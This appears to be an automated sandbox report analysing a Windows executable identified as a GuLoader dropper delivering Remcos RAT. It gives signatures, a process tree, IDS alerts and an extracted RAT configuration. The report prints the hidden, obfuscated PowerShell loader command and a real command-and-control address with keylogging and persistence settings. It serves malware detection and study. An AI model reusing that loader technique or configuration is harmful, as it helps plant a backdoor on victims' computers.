Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WtZl31OLfA.exe

Overview

General Information

Sample name:WtZl31OLfA.exe
renamed because original name is a hash value
Original sample name:293ebd610b0542289ffe9a52cab2c2a434dcff94918045a5ed1497deaee5eb87.exe
Analysis ID:1588308
MD5:74c8f736d425b1bd2027c2b5b144e188
SHA1:76f160d6c55611b99dcd10f85889957cb867990a
SHA256:293ebd610b0542289ffe9a52cab2c2a434dcff94918045a5ed1497deaee5eb87
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • WtZl31OLfA.exe (PID: 4508 cmdline: "C:\Users\user\Desktop\WtZl31OLfA.exe" MD5: 74C8F736D425B1BD2027C2B5B144E188)
    • powershell.exe (PID: 4396 cmdline: powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7060 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["87.120.116.187:56:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GC7VQU", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
SourceRuleDescriptionAuthorStrings
00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000005.00000002.4503566716.0000000005DAC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000001.00000002.2297304332.000000000A291000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 1 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7060, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49396
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4396, TargetFilename: C:\Users\user\AppData\Local\neoimpressionism\Vekselformular\WtZl31OLfA.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) ", CommandLine: powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WtZl31OLfA.exe", ParentImage: C:\Users\user\Desktop\WtZl31OLfA.exe, ParentProcessId: 4508, ParentProcessName: WtZl31OLfA.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) ", ProcessId: 4396, ProcessName: powershell.exe

            Stealing of Sensitive Information

            barindex
            Source: Registry Key setAuthor: Joe Security: Data: Details: 0C CC C1 61 31 11 4E AB 6F CE 7F C0 69 31 34 57 0E 18 3A 8A 18 8C 62 A9 78 E5 7F 4F 8D 96 57 F7 D1 36 53 05 75 7C DE 3A 35 13 31 9A E8 47 44 C1 5E 6E FA 7E 8E 6D 62 03 BB 92 05 86 E5 98 45 FD , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 7060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-GC7VQU\exepath
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T23:50:13.191092+010020327761Malware Command and Control Activity Detected192.168.2.54944087.120.116.18756TCP
            2025-01-10T23:50:15.834194+010020327761Malware Command and Control Activity Detected192.168.2.54945787.120.116.18756TCP
            2025-01-10T23:50:18.474523+010020327761Malware Command and Control Activity Detected192.168.2.54947387.120.116.18756TCP
            2025-01-10T23:50:21.130944+010020327761Malware Command and Control Activity Detected192.168.2.54949287.120.116.18756TCP
            2025-01-10T23:50:23.771523+010020327761Malware Command and Control Activity Detected192.168.2.54950887.120.116.18756TCP
            2025-01-10T23:50:26.412012+010020327761Malware Command and Control Activity Detected192.168.2.54952887.120.116.18756TCP
            2025-01-10T23:50:29.053247+010020327761Malware Command and Control Activity Detected192.168.2.54954587.120.116.18756TCP
            2025-01-10T23:50:31.681261+010020327761Malware Command and Control Activity Detected192.168.2.54956187.120.116.18756TCP
            2025-01-10T23:50:34.346014+010020327761Malware Command and Control Activity Detected192.168.2.54958287.120.116.18756TCP
            2025-01-10T23:50:36.975797+010020327761Malware Command and Control Activity Detected192.168.2.54960087.120.116.18756TCP
            2025-01-10T23:50:39.630932+010020327761Malware Command and Control Activity Detected192.168.2.54962087.120.116.18756TCP
            2025-01-10T23:50:42.318501+010020327761Malware Command and Control Activity Detected192.168.2.54963287.120.116.18756TCP
            2025-01-10T23:50:44.943596+010020327761Malware Command and Control Activity Detected192.168.2.54963387.120.116.18756TCP
            2025-01-10T23:50:47.553052+010020327761Malware Command and Control Activity Detected192.168.2.54963487.120.116.18756TCP
            2025-01-10T23:50:50.193711+010020327761Malware Command and Control Activity Detected192.168.2.54963587.120.116.18756TCP
            2025-01-10T23:50:52.834032+010020327761Malware Command and Control Activity Detected192.168.2.54963687.120.116.18756TCP
            2025-01-10T23:50:55.601321+010020327761Malware Command and Control Activity Detected192.168.2.54963787.120.116.18756TCP
            2025-01-10T23:50:58.240530+010020327761Malware Command and Control Activity Detected192.168.2.54963887.120.116.18756TCP
            2025-01-10T23:51:00.865768+010020327761Malware Command and Control Activity Detected192.168.2.54963987.120.116.18756TCP
            2025-01-10T23:51:03.639656+010020327761Malware Command and Control Activity Detected192.168.2.54964087.120.116.18756TCP
            2025-01-10T23:51:06.365467+010020327761Malware Command and Control Activity Detected192.168.2.54964187.120.116.18756TCP
            2025-01-10T23:51:08.977045+010020327761Malware Command and Control Activity Detected192.168.2.54964287.120.116.18756TCP
            2025-01-10T23:51:11.646605+010020327761Malware Command and Control Activity Detected192.168.2.54964387.120.116.18756TCP
            2025-01-10T23:51:14.334286+010020327761Malware Command and Control Activity Detected192.168.2.54964487.120.116.18756TCP
            2025-01-10T23:51:16.990714+010020327761Malware Command and Control Activity Detected192.168.2.54964587.120.116.18756TCP
            2025-01-10T23:51:19.679619+010020327761Malware Command and Control Activity Detected192.168.2.54964687.120.116.18756TCP
            2025-01-10T23:51:22.302695+010020327761Malware Command and Control Activity Detected192.168.2.54964787.120.116.18756TCP
            2025-01-10T23:51:24.960040+010020327761Malware Command and Control Activity Detected192.168.2.54964887.120.116.18756TCP
            2025-01-10T23:51:27.601561+010020327761Malware Command and Control Activity Detected192.168.2.54964987.120.116.18756TCP
            2025-01-10T23:51:30.225642+010020327761Malware Command and Control Activity Detected192.168.2.54965087.120.116.18756TCP
            2025-01-10T23:51:32.859651+010020327761Malware Command and Control Activity Detected192.168.2.54965187.120.116.18756TCP
            2025-01-10T23:51:35.495589+010020327761Malware Command and Control Activity Detected192.168.2.54965287.120.116.18756TCP
            2025-01-10T23:51:38.167989+010020327761Malware Command and Control Activity Detected192.168.2.54965387.120.116.18756TCP
            2025-01-10T23:51:40.802585+010020327761Malware Command and Control Activity Detected192.168.2.54965487.120.116.18756TCP
            2025-01-10T23:51:43.443660+010020327761Malware Command and Control Activity Detected192.168.2.54965587.120.116.18756TCP
            2025-01-10T23:51:45.959652+010020327761Malware Command and Control Activity Detected192.168.2.54965687.120.116.18756TCP
            2025-01-10T23:51:48.460410+010020327761Malware Command and Control Activity Detected192.168.2.54965787.120.116.18756TCP
            2025-01-10T23:51:51.005833+010020327761Malware Command and Control Activity Detected192.168.2.54965887.120.116.18756TCP
            2025-01-10T23:51:53.463654+010020327761Malware Command and Control Activity Detected192.168.2.54965987.120.116.18756TCP
            2025-01-10T23:51:55.881593+010020327761Malware Command and Control Activity Detected192.168.2.54966087.120.116.18756TCP
            2025-01-10T23:51:58.302859+010020327761Malware Command and Control Activity Detected192.168.2.54966187.120.116.18756TCP
            2025-01-10T23:52:00.711060+010020327761Malware Command and Control Activity Detected192.168.2.54966287.120.116.18756TCP
            2025-01-10T23:52:03.037348+010020327761Malware Command and Control Activity Detected192.168.2.54966387.120.116.18756TCP
            2025-01-10T23:52:05.335735+010020327761Malware Command and Control Activity Detected192.168.2.54967187.120.116.18756TCP
            2025-01-10T23:52:07.631080+010020327761Malware Command and Control Activity Detected192.168.2.54967287.120.116.18756TCP
            2025-01-10T23:52:09.943519+010020327761Malware Command and Control Activity Detected192.168.2.54967387.120.116.18756TCP
            2025-01-10T23:52:12.217853+010020327761Malware Command and Control Activity Detected192.168.2.54967487.120.116.18756TCP
            2025-01-10T23:52:14.443570+010020327761Malware Command and Control Activity Detected192.168.2.54967587.120.116.18756TCP
            2025-01-10T23:52:16.709285+010020327761Malware Command and Control Activity Detected192.168.2.54967687.120.116.18756TCP
            2025-01-10T23:52:18.927564+010020327761Malware Command and Control Activity Detected192.168.2.54967887.120.116.18756TCP
            2025-01-10T23:52:21.117636+010020327761Malware Command and Control Activity Detected192.168.2.54967987.120.116.18756TCP
            2025-01-10T23:52:23.287082+010020327761Malware Command and Control Activity Detected192.168.2.54968087.120.116.18756TCP
            2025-01-10T23:52:25.431838+010020327761Malware Command and Control Activity Detected192.168.2.54968187.120.116.18756TCP
            2025-01-10T23:52:27.584423+010020327761Malware Command and Control Activity Detected192.168.2.54968287.120.116.18756TCP
            2025-01-10T23:52:29.708792+010020327761Malware Command and Control Activity Detected192.168.2.54968387.120.116.18756TCP
            2025-01-10T23:52:31.802867+010020327761Malware Command and Control Activity Detected192.168.2.54968487.120.116.18756TCP
            2025-01-10T23:52:33.881473+010020327761Malware Command and Control Activity Detected192.168.2.54968587.120.116.18756TCP
            2025-01-10T23:52:35.943061+010020327761Malware Command and Control Activity Detected192.168.2.54968687.120.116.18756TCP
            2025-01-10T23:52:38.927736+010020327761Malware Command and Control Activity Detected192.168.2.54968787.120.116.18756TCP
            2025-01-10T23:52:40.959101+010020327761Malware Command and Control Activity Detected192.168.2.54968887.120.116.18756TCP
            2025-01-10T23:52:42.974324+010020327761Malware Command and Control Activity Detected192.168.2.54968987.120.116.18756TCP
            2025-01-10T23:52:45.086422+010020327761Malware Command and Control Activity Detected192.168.2.54969087.120.116.18756TCP
            2025-01-10T23:52:47.055697+010020327761Malware Command and Control Activity Detected192.168.2.54969187.120.116.18756TCP
            2025-01-10T23:52:49.055770+010020327761Malware Command and Control Activity Detected192.168.2.54969287.120.116.18756TCP
            2025-01-10T23:52:51.193547+010020327761Malware Command and Control Activity Detected192.168.2.54969387.120.116.18756TCP
            2025-01-10T23:52:53.165691+010020327761Malware Command and Control Activity Detected192.168.2.54969487.120.116.18756TCP
            2025-01-10T23:52:55.083766+010020327761Malware Command and Control Activity Detected192.168.2.54969587.120.116.18756TCP
            2025-01-10T23:52:57.099445+010020327761Malware Command and Control Activity Detected192.168.2.54969687.120.116.18756TCP
            2025-01-10T23:52:59.011278+010020327761Malware Command and Control Activity Detected192.168.2.54969787.120.116.18756TCP
            2025-01-10T23:53:00.943590+010020327761Malware Command and Control Activity Detected192.168.2.54969887.120.116.18756TCP
            2025-01-10T23:53:02.865752+010020327761Malware Command and Control Activity Detected192.168.2.54969987.120.116.18756TCP
            2025-01-10T23:53:04.758994+010020327761Malware Command and Control Activity Detected192.168.2.54970087.120.116.18756TCP
            2025-01-10T23:53:06.647718+010020327761Malware Command and Control Activity Detected192.168.2.54970187.120.116.18756TCP
            2025-01-10T23:53:08.570146+010020327761Malware Command and Control Activity Detected192.168.2.54970487.120.116.18756TCP
            2025-01-10T23:53:10.477822+010020327761Malware Command and Control Activity Detected192.168.2.54970587.120.116.18756TCP
            2025-01-10T23:53:12.342372+010020327761Malware Command and Control Activity Detected192.168.2.54970687.120.116.18756TCP
            2025-01-10T23:53:14.350298+010020327761Malware Command and Control Activity Detected192.168.2.54970787.120.116.18756TCP
            2025-01-10T23:53:16.256961+010020327761Malware Command and Control Activity Detected192.168.2.54970887.120.116.18756TCP
            2025-01-10T23:53:18.083610+010020327761Malware Command and Control Activity Detected192.168.2.54970987.120.116.18756TCP
            2025-01-10T23:53:19.955480+010020327761Malware Command and Control Activity Detected192.168.2.54971087.120.116.18756TCP
            2025-01-10T23:53:21.786759+010020327761Malware Command and Control Activity Detected192.168.2.54971187.120.116.18756TCP
            2025-01-10T23:53:23.599331+010020327761Malware Command and Control Activity Detected192.168.2.54971287.120.116.18756TCP
            2025-01-10T23:53:25.428309+010020327761Malware Command and Control Activity Detected192.168.2.54971387.120.116.18756TCP
            2025-01-10T23:53:27.307804+010020327761Malware Command and Control Activity Detected192.168.2.54971487.120.116.18756TCP
            2025-01-10T23:53:29.102022+010020327761Malware Command and Control Activity Detected192.168.2.54971587.120.116.18756TCP
            2025-01-10T23:53:30.883954+010020327761Malware Command and Control Activity Detected192.168.2.54971687.120.116.18756TCP
            2025-01-10T23:53:32.708951+010020327761Malware Command and Control Activity Detected192.168.2.54971787.120.116.18756TCP
            2025-01-10T23:53:34.537850+010020327761Malware Command and Control Activity Detected192.168.2.54971887.120.116.18756TCP
            2025-01-10T23:53:36.318059+010020327761Malware Command and Control Activity Detected192.168.2.54971987.120.116.18756TCP
            2025-01-10T23:53:38.099501+010020327761Malware Command and Control Activity Detected192.168.2.54972087.120.116.18756TCP
            2025-01-10T23:53:39.881944+010020327761Malware Command and Control Activity Detected192.168.2.54972187.120.116.18756TCP
            2025-01-10T23:53:41.662152+010020327761Malware Command and Control Activity Detected192.168.2.54972287.120.116.18756TCP
            2025-01-10T23:53:43.443308+010020327761Malware Command and Control Activity Detected192.168.2.54972387.120.116.18756TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T23:50:06.400374+010028032702Potentially Bad Traffic192.168.2.549396142.250.185.78443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["87.120.116.187:56:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GC7VQU", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
            Source: C:\Users\user\AppData\Local\neoimpressionism\Vekselformular\WtZl31OLfA.exeReversingLabs: Detection: 57%
            Source: WtZl31OLfA.exeReversingLabs: Detection: 57%
            Source: WtZl31OLfA.exeVirustotal: Detection: 71%Perma Link
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7060, type: MEMORYSTR
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
            Source: C:\Users\user\AppData\Local\neoimpressionism\Vekselformular\WtZl31OLfA.exeJoe Sandbox ML: detected
            Source: WtZl31OLfA.exeJoe Sandbox ML: detected
            Source: WtZl31OLfA.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.5:49396 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.5:49406 version: TLS 1.2
            Source: WtZl31OLfA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: %eqm.Core.pdb source: powershell.exe, 00000001.00000002.2296178864.00000000088A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdbl source: powershell.exe, 00000001.00000002.2296178864.00000000088A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2296384908.00000000088BF000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeCode function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeCode function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49440 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49457 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49473 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49492 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49508 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49528 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49545 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49561 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49582 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49600 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49620 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49636 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49641 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49638 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49642 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49643 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49635 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49639 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49632 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49648 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49652 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49647 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49646 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49672 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49660 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49673 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49676 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49649 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49658 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49655 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49651 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49682 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49659 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49695 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49657 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49701 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49654 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49679 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49653 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49696 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49645 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49692 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49674 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49640 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49688 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49717 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49709 -> 87.120.116.187:56
